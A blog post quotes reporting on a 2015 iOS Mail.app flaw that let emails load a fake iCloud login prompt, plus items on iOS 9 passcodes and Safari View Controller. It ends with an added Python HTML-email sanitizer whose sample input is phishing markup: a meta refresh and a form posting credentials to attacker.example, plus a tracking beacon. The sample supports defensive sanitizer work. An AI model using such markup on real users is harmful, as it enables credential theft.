<article>
<h1>iCloud Passwords in Mail, Device Passwords, and Safari Passwords</h1>
<p>Published 2015-06-11 (last modified 2020-02-24). Permalink: <a href="https://mjtsai.com/blog/2015/06/11/icloud-passwords-in-mail-device-passwords-and-safari-passwords/">https://mjtsai.com/blog/2015/06/11/icloud-passwords-in-mail-device-passwords-and-safari-passwords/</a></p>
<p><a href="http://arstechnica.com/security/2015/06/serious-ios-bug-makes-it-easy-to-steal-users-icloud-passwords/">Dan Goodin</a>:</p>
<blockquote cite="http://arstechnica.com/security/2015/06/serious-ios-bug-makes-it-easy-to-steal-users-icloud-passwords/">
<p>The <a href="https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master">proof-of-concept attack</a> exploits a flaw in Mail.app, the default iOS e-mail program. Since <a href="http://arstechnica.com/apple/2015/04/ios-8-3-released-with-fixes-for-performance-and-just-about-everything-else/">the release of version 8.3 in early April</a>, the app has failed to properly strip out potentially dangerous HTML code from incoming e-mail messages. The proof-of-concept exploit capitalizes on this failure by downloading a form from a remote server that looks identical to the legitimate iCloud log-in prompt. It can be displayed each time the booby-trapped message is viewed.</p>
<p>“This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message,” a user with the GitHub name jansoucek wrote in a readme file accompanying the exploit. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS [<a href="http://en.wikipedia.org/wiki/Cascading_Style_Sheets">cascading style sheets</a>].”</p>
</blockquote>
<p><a href="http://www.macrumors.com/2015/06/10/new-ios-mail-bug-icloud-passwords/">Mitchel Broussard</a> (<a href="https://news.ycombinator.com/item?id=9690309">comments</a>):</p>
<blockquote cite="http://www.macrumors.com/2015/06/10/new-ios-mail-bug-icloud-passwords/">
<p>Soucek says that Apple did not respond to his discovery of the bug when he stumbled across it back in January.</p>
<p>[…]</p>
<p>Soucek kept the details of the bug only between himself and Apple, letting the company have time to possibly fix the attack and inform him of its progress. Given the company’s remaining quietness on the subject, he decided to publish the proof of concept - called the Mail.app inject kit - on <a href="https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master">GitHub</a> in hopes of spreading its awareness.</p>
</blockquote>
<p><a href="http://arstechnica.com/apple/2015/06/apple-to-require-6-digit-passcodes-on-newer-iphones-ipads-under-ios-9/">Cyrus Farivar</a>:</p>
<blockquote cite="http://arstechnica.com/apple/2015/06/apple-to-require-6-digit-passcodes-on-newer-iphones-ipads-under-ios-9/">
<p>As part of its iOS 9 <a href="http://arstechnica.com/apple/2015/06/apple-announces-ios-9/">announcement</a> on Monday, Apple revealed that all newer iDevices equipped with TouchID and running the newer version of the operating system will be required to upgrade from a four-digit to a six-digit passcode. Passcodes remain optional, and users can create a more complex alphanumeric password, but six digits will be the minimum. After 10 failed attempts to type in the code, the device will erase itself.</p>
</blockquote>
<p><a href="http://www.imore.com/safari-view-controller-will-bring-persistent-logins-web-view-ios-apps">Dan Thorp-Lancaster</a>:</p>
<blockquote cite="http://www.imore.com/safari-view-controller-will-bring-persistent-logins-web-view-ios-apps">
<p>The issue up until now has been that web view hasn’t been allowed to store cookies for security reasons, so logins can’t persist. The solution that Safari view controller brings to the table is to essentially pull the information from Safari.</p>
</blockquote>
<p><a href="https://developer.apple.com/library/safari/releasenotes/General/WhatsNewInSafari/Articles/Safari_9.html">Apple</a>:</p>
<blockquote cite="https://developer.apple.com/library/safari/releasenotes/General/WhatsNewInSafari/Articles/Safari_9.html">
<p>You can use <code>SFSafariViewController</code> to display web content within your app. The Safari View Controller shares cookies and other website data with Safari, and has many of Safari’s features, like Safari AutoFill and Safari Reader. Unlike Safari itself, the Safari View Controller UI is tailored for displaying a single page, featuring a Done button that’ll take users right back where they were in your app.</p>
<p>Consider replacing your <code>WKWebView</code> or <code>UIWebView</code>-based browsers with <code>SFSafariViewController</code> if your app displays web content but does not customize that content.</p>
</blockquote>
<p>Category: Technology. Tags: bug, cocoa, ios, ios-8, ios-9, mobilemail, security, web, wkwebview.</p>
</article>
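<p>The Mail.app flaw quoted above comes down to a renderer accepting HTML it should have filtered: with JavaScript off, what remains for an attacker is to replace the message with remotely loaded content, paint a convincing prompt with CSS, and ship whatever the user types through a plain form. Below is an added example, not code from the inject kit, from Apple, or from this post: an allowlist sanitizer in Python that a mail client could run on a message body before handing it to a script-disabled web view. The page does not say which tags the kit uses, so the sample message is constructed to have the shape the readme describes (a meta refresh to a remote document, a stylesheet, a form posting to a collector, a tracking image) rather than copied from the kit; the element allowlist, the <code>attacker.example</code> hostname, and the rule that images may only come from <code>cid:</code> attachments are this example's own choices.</p>

```python
"""Allowlist sanitizer for HTML e-mail bodies.

Added example; not code from the Mail.app inject kit, from Apple, or from
the post it accompanies. Assumption: the renderer is a JavaScript-disabled
web view, so the sanitizer targets what HTML and CSS can do on their own:
load a remote document in place of the message, draw a fake login prompt,
and submit typed credentials with a plain <form>. Hostile markup is
removed at parse time, not with regular expressions.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements allowed to survive, and the attributes each may keep.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "div": set(), "span": set(), "b": set(),
    "strong": set(), "i": set(), "em": set(), "u": set(), "blockquote": set(),
    "ul": set(), "ol": set(), "li": set(), "h1": set(), "h2": set(),
    "h3": set(), "table": set(), "tr": set(), "td": set(), "th": set(),
    "a": {"href"},
    "img": {"src", "alt", "width", "height"},
}
# Elements removed together with everything nested inside them.
DROP_SUBTREE = {"form", "input", "button", "select", "textarea", "iframe",
                "frame", "frameset", "object", "embed", "applet", "meta",
                "link", "base", "script", "style", "template"}
VOID = {"br", "img", "input", "meta", "link", "base", "embed"}
LINK_SCHEMES = {"http", "https", "mailto"}
IMG_SCHEMES = {"cid"}   # inline attachments only: no remote fetch on open


def safe_url(value, allowed_schemes):
    """Return the URL if its scheme is allowlisted, else None.

    Allowlisting (instead of blocking javascript:) also rejects data:,
    scheme-less URLs, and schemes obfuscated with embedded whitespace."""
    value = value.strip()
    if urlsplit(value).scheme.lower() in allowed_schemes:
        return value
    return None


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # sanitized fragments
        self.open = []        # kept elements awaiting their close tag
        self.drop_stack = []  # non-empty while inside a dropped subtree
        self.dropped = []     # top-level elements removed, for audit logs

    def handle_starttag(self, tag, attrs):
        if self.drop_stack:               # nested inside something dropped
            if tag not in VOID:
                self.drop_stack.append(tag)
            return
        if tag in DROP_SUBTREE:
            self.dropped.append(tag)
            if tag not in VOID:
                self.drop_stack.append(tag)
            return
        if tag not in ALLOWED_TAGS:       # unknown element: keep text only
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue                  # style=, class=, on*= all end here
            if name == "href":
                value = safe_url(value, LINK_SCHEMES)
            elif name == "src":
                value = safe_url(value, IMG_SCHEMES)
            if value is not None:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "img" and not any(k.startswith(" src=") for k in kept):
            self.dropped.append(tag)      # image with no acceptable source
            return
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in VOID:
            return
        if self.drop_stack:               # only a matching close ends a drop
            if tag in self.drop_stack:
                while self.drop_stack.pop() != tag:
                    pass
        elif tag in self.open:            # close back to the matching element
            while self.open:
                top = self.open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.drop_stack:
            self.out.append(escape(data))

    def close(self):
        super().close()
        while self.open:                  # close anything left dangling
            self.out.append(f"</{self.open.pop()}>")


def sanitize(body):
    """Return (clean_html, dropped_elements) for one message body."""
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample with the shape the quoted readme describes; it is not
# the inject kit's markup. attacker.example is a placeholder hostname.
SAMPLE = (
    '<meta http-equiv="refresh" content="0; url=http://attacker.example/">'
    '<style>body{background:#fff} .prompt{position:fixed;top:0}</style>'
    '<div class="prompt" style="position:fixed">'
    '<form method="post" action="http://attacker.example/collect">'
    '<p>Sign in to iCloud</p>'
    '<input name="u"><input type="password" name="p">'
    '<button>OK</button></form></div>'
    '<p>Hi, see the <a href="https://example.com/doc">document</a> '
    '<img src="cid:logo@example.com" alt="logo"> '
    '<img src="http://attacker.example/beacon.gif"></p>'
)

if __name__ == "__main__":
    clean, removed = sanitize(SAMPLE)
    print(clean)
    print("dropped:", removed)
```

<p>The allowlist does not need to know how the kit is built: whichever tags it combines, no form, remote document, stylesheet, or inline style reaches the web view, and the <code>dropped</code> list gives the client something to log when a message is stripped this heavily. Two caveats: <code>HTMLParser</code> is a tokenizer, not a tree builder, so a dropped element that is never closed swallows everything after it (fail-closed, but visible only in the log), and links stay tappable, so the URL the client shows on a long press must be the real <code>href</code>.</p>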